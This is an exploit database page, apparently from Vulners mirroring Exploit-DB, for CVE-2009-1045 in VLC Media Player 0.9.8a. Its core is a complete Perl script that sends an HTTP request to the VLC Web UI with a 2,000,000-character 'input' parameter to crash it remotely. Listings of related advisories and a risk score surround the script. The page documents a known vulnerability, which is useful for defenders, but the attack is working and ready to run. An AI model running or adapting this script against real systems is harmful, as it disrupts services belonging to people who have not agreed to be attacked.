Lucene search
+L

VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service

🗓️ 16 Mar 2009 00:00:00Reported by TheLeaderType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

VLC Media Player 0.9.8a Web UI Remote Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1045
16 Mar 200900:00
circl
cve
CVE
CVE-2009-1045
23 Mar 200916:00
cve
cvelist
Cvelist
CVE-2009-1045
23 Mar 200916:00
cvelist
debiancve
Debian CVE
CVE-2009-1045
23 Mar 200916:00
debiancve
euvd
EUVD
EUVD-2009-1046
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1045
23 Mar 200916:30
nvd
openvas
OpenVAS
VLC Media Player Stack Overflow Vulnerability (Mar 2009) - Windows
26 Mar 200900:00
openvas
openvas
OpenVAS
VLC Media Player Stack Overflow Vulnerability (Mar 2009) - Linux
26 Mar 200900:00
openvas
openvas
OpenVAS
VLC Media Player Stack Overflow Vulnerability (Win-Mar09)
26 Mar 200900:00
openvas
openvas
OpenVAS
VLC Media Player Stack Overflow Vulnerability (Lin-Mar09)
26 Mar 200900:00
openvas
Rows per page
#!/usr/bin/perl

########################################################
## VLC 0.9.8a Web UI Remote Stack Overflow (DoS) by TheLeader
## GreetZ: forums.hacking.org.il
## TiP oF TEh DaY: Rock on! =]
########################################################

use IO::Socket;

my $host = shift || 'localhost'; # Target host
my $port = shift || 8080; # Target port. Default port = 8080

#Note: for some reason, A x 2070785 = terminate without crash;
my $req = "GET /requests/status.xml?command=in_play&input=" . "A" x 2000000 . " HTTP/1.1\r\n";
$req .= "Host: $host:$port\r\n";
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)\r\n";
$req .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$req .= "Accept-Language: he,en-US;q=0.7,en;q=0.3\r\n";
$req .= "Accept-Encoding: gzip,deflate\r\n";
$req .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n";
$req .= "Keep-Alive: 300\r\n";
$req .= "Connection: keep-alive\r\n";
$req .= "Referer: http://$host:$port/\r\n\r\n";

print "\nConnecting to $host on port $port\n";

my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto => 'tcp');
$sock or die "Cannot connect to server: $!";
print "Sending HTTP request..\n";
print $sock $req;
print "Exploited. Target should be DoSed by now :)\n";

close $sock;

# milw0rm.com [2009-03-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.09216
28